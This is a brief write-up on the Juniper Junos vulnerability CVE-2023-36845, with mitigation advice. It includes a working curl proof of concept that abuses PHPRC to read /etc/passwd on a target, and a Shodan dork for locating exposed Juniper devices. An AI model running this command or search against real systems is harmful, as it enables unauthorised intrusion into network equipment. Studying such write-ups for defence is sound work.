Exploit for PHP External Variable Modification in Juniper Junos CVE-2023-36845

## https://sploitus.com/exploit?id=90054D53-1D11-52A9-85FA-7F99CC3D370F
> [!NOTE]
> Useful information that users should know, even when skimming content. this content is content to learn not to be abused or on the wrong track, I wrote this article just to solely learn about cybersecurity research, namely becoming a Penetration Tester in dealing with the CVE-2023-36845 vulnerability.

The following is a write-up or explanation of the CVE-2023-36845 vulnerability and how to protect yourself from this vulnerability. 
**Juniper Networks POC Understanding CVE-2023–36845 Remote Code Execution Exploit and Protection**



![alt text](https://i.ibb.co.com/pzXXs4D/Dark-Simple-Future-Linked-In-Banner-1.png)


### Vulnerability Description:
A PHP External Variable Modification vulnerability was discovered in Juniper Networks Junos OS, specifically impacting the EX Series and SRX Series. This vulnerability permits an unauthenticated attacker to remotely execute malicious code. By exploiting this vulnerability through a carefully crafted request, attackers can manipulate the PHP execution environment, facilitating the injection and execution of code.

### Exploiting CVE-2023–36845
Exploiting this vulnerability is as simple as making a crafted request with the PHPRC variable set. The attacker can remotely execute code, thereby compromising the system. A sample Proof of Concept (PoC) command is as follows:
```bash
curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'
```
### How to Protect Your Systems
Protecting your systems from CVE-2023–36845 is of utmost importance. Here are some key steps to safeguard your Juniper Networks Junos OS installations:
 1. **Patch Your System:** Ensure that your Junos OS is updated to a non-vulnerable version. Juniper Networks regularly releases patches and updates to address security concerns.
 1. **Access Control:** Limit access to your Junos OS devices to trusted IP addresses or network segments. This reduces the risk of unauthorized access.
 1. **Firewall Rules:** Implement firewall rules to restrict inbound and outbound traffic to and from your devices.
 1. **Web Application Firewall (WAF):** Deploy a WAF to filter and monitor incoming web traffic, which can help detect and block malicious requests.
 1. **Security Scanning:** Use security scanning tools like Burp Suite to proactively test your systems for vulnerabilities.

### Shodan Dork for CVE-2023–36845
To identify systems susceptible to CVE-2023–36845 using Shodan, you can utilize the following dork:
```c
title:"Juniper" http.favicon.hash:2141724739 country:"US"
```
This dork narrows down the search to Juniper devices with the specified favicon hash in the United States.


### In Conclusion
CVE-2023–36845 is a significant threat to Juniper Networks Junos OS users. Understanding the vulnerability, actively patching your systems, and implementing security measures can help protect your network infrastructure. Staying vigilant is key to mitigating the risks associated with such vulnerabilities in the ever-evolving landscape of cybersecurity.